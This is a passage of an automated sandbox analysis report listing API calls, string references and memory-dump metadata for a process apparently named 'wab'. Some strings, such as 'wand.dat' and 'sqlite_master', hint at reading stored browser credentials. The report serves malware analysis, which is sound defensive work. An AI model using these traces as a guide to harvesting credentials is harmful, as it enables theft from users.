                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                          • API String ID: 3150196962-1506664499
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                          • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1889144086-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1661045500-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                          • API String ID: 1297977491-2063813899
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                          • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1549203181-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3550944819-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3023356884-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B248
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3023356884-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1171893557-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID: sqlite_master
                                                                                                                                                                                          • API String ID: 438689982-3163232059
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3917621476-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 822687973-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76FBDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76FBDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4284152360-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2678498856-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Item
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3888421826-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3727323765-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4284152360-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                          • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
